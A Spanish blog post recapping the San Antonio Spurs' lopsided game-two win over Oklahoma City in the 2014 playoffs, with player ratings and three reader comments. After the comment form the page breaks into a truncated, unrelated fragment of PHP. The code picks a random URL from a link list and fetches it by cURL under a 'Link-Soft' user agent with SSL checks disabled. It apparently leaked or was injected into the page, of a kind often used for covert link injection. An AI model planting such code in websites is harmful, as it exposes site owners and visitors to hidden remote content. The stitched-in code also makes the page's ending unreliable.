La Crónica: Los Spurs golpean aún más duro

22 de May de 2014 por Simon

Ya se veía venir tras el primer asalto en el que Spurs habían golpeado muy duramente a los Thunder. El segundo aún fue peor, los Spurs consiguieron frenar por completo a las dos estrellas del equipo rival y ganaron a placer con un importante aporte de toda su plantilla.

Los de Oklahoma empezaron el partido bastante enchufados consiguiendo imponer su ritmo de la mano de un gran Kevin Durant. Gracias a la colaboración del rookie Steve Adams y Caron Butler, los Thunder consiguieron llegar por delante al segundo cuarto. Pero allí se acabaron las bromas. Tony Parker y Manu Ginobili se pusieron el mono de trabajo y junto al acierto en el triple de Danny Green sacaron de rueda a los de Scott Brooks en apenas 3 minutos. En el tercer cuarto Parker y Green siguieron a lo suyo, el base volviendo loco a la defensa de los Thunder con su rapidez y agilidad y el alero martilleando desde fuera las esperanzas del equipo rival con un triple tras otro. Además en el tercer cuarto además se unió a la fiesta Tim Duncan que terminó de rematar a los moribundos Thunder. Con una ventaja superior a los 30 puntos el último cuarto apenas tuvo interés más allá de ver a Lamb hacer números (77-112). 

No lo hemos comentado hasta ahora pero pocos partidos veremos a Durant peores que el que disputó ayer. Comenzó muy enchufado anotando 8 puntos y repartiendo mucho juego entre sus compañeros en el primer cuarto pero a partir de ahí desapareció. Estuvo totalmente desacertado de cara al aro e incluso llegó a pasar desapercibido el agumos momentos del juego sin asumir el protagonismo habitual. Sólo fue capaz de anotar 7 puntos en lo que quedaba de encuentro y no repartió ni una sola asistencia más. Parecido ocurrió con Westbrook que estuvo muy desacertado de cara al aro pero al menos no dejó de intentarlo, lo cual no estamos seguros de que fuera del todo positivo…

En definitiva, pocas lecturas positivas para los Thunder en estos dos primeros partidos a domicilio. Se llevan dos derrotas contundentes y la sensación de que están a años luz de esta máquina de jugar baloncesto que son los Spurs.

PREMIOS

MVP: Complicado elegir entre Tony Parker (22p), Tim Duncan (14p – 12r) y Danny Green (21p – 7 de 10 en T3), cada uno cumpliendo a la perfección su papel.

Rookie: Continuamos el seguimiento a Steve Adams (9p – 8r) que sigue cumpliendo con nota.

Sorpresa: Esperábamos que los San Antonio Spurs se impusieran pero no con esta facilidad y contundencia. Ahora mismo los Thunder parecen un muñero en sus manos.

Decepción: Kevin Durant (15p – 6 de 16 en TC) y Russell Westbrook (15p – 7 de 24 en TC) se mostraron totalmente desquiciados, en ocasiones el uno con el otro. El producto de la frustración.

Esfuerzo en vano: Westbrook fue el que más peleó por sacar el partido adelante. Ante la desaparición de Durant, sólo contó prácticamente con la colaboración de Adams, Reggie Jackson (8p – 4a) y Caron Butler (9p – 4r).

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Esteban dice:
    #1

    cunsulto, el juego interior conformado por Perkins, Adams, Collison y Perry jones, es el peor visto en una final de conferencia?

    madre mia, uno peor que el otro en ambos costados, es cierto que adams maneja buenos numeros, pero su influencia en el partido es igual a 0, no se hace sentir en defensa y en ataque solo pasa a bola amen de algun tirop muy solo

    lo de perkins, es bue, es perkins, para dar algunos golpes y poco mas

    tampoco es q

      Citar

  2. Esteban dice:
    #2

    ibaka sea un dios bajo el aro, pero sin duas es lo mas destacable dentro de un juego interior muy pobre, sin el su pintura es una verguenza

    por optr parte hay un gran factor psicologico en todo esto, los Spurs sin ponerse colorados atacaron la zona una y otra vez y lucharon el rebote ofensivo como si enfrente jugaran sin internos

      Citar

  3. HisRoyalAirness dice:
    #3

    Pop quiere acabar con esto cuanto antes para descansar para las Finales

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>